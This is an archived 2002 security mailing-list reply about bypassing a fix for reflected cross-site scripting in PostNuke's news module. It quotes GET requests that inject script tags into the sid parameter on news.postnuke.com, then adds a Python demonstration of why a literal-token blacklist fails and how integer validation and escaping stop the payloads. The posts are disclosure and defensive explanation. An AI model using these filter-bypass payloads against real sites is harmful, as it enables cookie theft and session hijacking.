Re: Postnuke XSS fixed

From: Sebastian Konstanty Zdrojewski (s.zdrojewskiat_private)
Date: Thu Oct 03 2002 - 00:10:23 PDT

    I saw the problem has been solved, and the GET requests you proposed below
    no longer work. But if you use the following GET, the popup appears again:
    
    on the URL http://news.postnuke.com/modules.php
    
    the GET
    
    ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script+>
    
    Best Regards,
    
    Sebastian
    
    Daniel Woods wrote:
    
      >Humm!
      >
      >Not so fast on the praise :(
      >
      >It only took me a couple of workarounds to find ways to bypass the check.
      >
      >  http://news.postnuke.com/modules.php
      >  ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
      >
      >Using the request...
      >  ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
      >gives me the DB Error: message
      >
      >And using the request...
      >  ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
      >gives me the Alert Popup and DB Error: message...  the '+' is treated
      >as a blank.
      >
      >Thanks... Dan.
    
    -- 
    Sebastian Konstanty Zdrojewski
    IT Analyst
    
    Neticon a brand of Every Level S.r.l.
    Via Valtellina 16 - 20159 Milano - MI - Italy
    
    Phone    (+39) 02.68.80.731
    E-Mail   s.zdrojewskiat_private
    Website  http://www.neticon.it
    
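    The exchange above shows a check on the literal tokens <script> and </script> being bypassed by <script+> and </script+>: the web server decodes '+' to a space before the application sees the value, and a browser accepts whitespace before the '>' of both start and end tags, so the tag still executes. The Python below is an added example, not PostNuke code or anything posted in the thread. The naive_blacklist_blocks filter is a hypothetical stand-in for the patched check (its real logic is not on the page), the browser model is a deliberately simplified tokenizer rule, and the sample queries are the three request strings from the thread plus a constructed benign one. It contrasts that filter with the handling a practitioner would want: decode first, then validate sid as an integer (which also removes the "DB Error" the payloads trigger), and HTML-escape anything that is echoed back.

```python
import html
import re
from typing import Optional
from urllib.parse import unquote_plus

# Constructed sample input: the three request strings quoted in the thread
# (Dan's two variants and Sebastian's), plus a benign request for contrast.
SAMPLE_QUERIES = {
    "plain":       "op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>",
    "backslash":   "op=modload&name=News&file=article&sid=<\\script>alert(document.cookie);</script>",
    "open_space":  "op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>",
    "close_space": "op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script+>",
    "benign":      "op=modload&name=News&file=article&sid=42",
}

# Hypothetical stand-in for the patched check discussed in the thread (the
# real logic is not on the page): reject a request only when the literal
# tokens "<script>" and "</script>" both appear in the raw query string.
NAIVE_TAG_PAIR = re.compile(r"<script>.*</script>", re.IGNORECASE | re.DOTALL)


def naive_blacklist_blocks(raw_query: str) -> bool:
    """Blacklist applied to the raw, still URL-encoded query string."""
    return NAIVE_TAG_PAIR.search(raw_query) is not None


def parse_query(raw_query: str) -> dict:
    """Decode the query the way the web server does before the application
    sees it: '+' becomes a space and %XX escapes are decoded. Splits only on
    '&' so the result does not depend on how a given Python version treats ';'."""
    params = {}
    for pair in raw_query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


# Simplified model of the HTML tokenizer, not a full parser: a tag name ends
# at whitespace, '/' or '>', so "<script >" opens a script element exactly as
# "<script>" does and "</script >" closes it, while "<\script>" is plain text.
OPEN_SCRIPT = re.compile(r"<script[\s/>]", re.IGNORECASE)
CLOSE_SCRIPT = re.compile(r"</script[\s/>]", re.IGNORECASE)


def browser_executes(decoded_value: str) -> bool:
    """True when the decoded value, reflected unescaped into the page, contains
    a script start tag and an end tag under the model above."""
    return bool(OPEN_SCRIPT.search(decoded_value) and CLOSE_SCRIPT.search(decoded_value))


# Hardened handling: 'sid' is an article id, so validate it as a positive
# integer after decoding. This rejects every payload above regardless of how
# the tag is spelled and also removes the "DB Error" the payloads trigger.
SID_PATTERN = re.compile(r"[1-9][0-9]{0,9}")


def validate_sid(raw_query: str) -> Optional[int]:
    sid = parse_query(raw_query).get("sid", "")
    return int(sid) if SID_PATTERN.fullmatch(sid) else None


def rejection_message(raw_query: str) -> str:
    """If a rejected value must be echoed, escape it at output time: the
    escaping fixes the reflection, the integer check fixes the DB error."""
    sid = parse_query(raw_query).get("sid", "")
    return "No such article: " + html.escape(sid, quote=True)


def analyse(raw_query: str) -> dict:
    """Compare the three views of one request: raw-string blacklist, browser
    interpretation of the decoded value, and the hardened integer check."""
    decoded = parse_query(raw_query).get("sid", "")
    return {
        "naive_blocks": naive_blacklist_blocks(raw_query),
        "browser_executes": browser_executes(decoded),
        "hardened_accepts": validate_sid(raw_query) is not None,
    }


if __name__ == "__main__":
    for name, query in SAMPLE_QUERIES.items():
        result = analyse(query)
        print(f"{name:12} naive_blocks={result['naive_blocks']!s:5} "
              f"browser_executes={result['browser_executes']!s:5} "
              f"hardened_accepts={result['hardened_accepts']}")
```

    Running it shows the pattern from the thread: only the plain <script>...</script> request is stopped by the literal-token check, while both whitespace variants slip past it and still read as script tags once decoded, and the <\script> variant is neither blocked nor executable (the "DB Error only" case). The integer check rejects all four payloads and accepts the benign id.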



    This archive was generated by hypermail 2b30 : Thu Oct 03 2002 - 12:16:20 PDT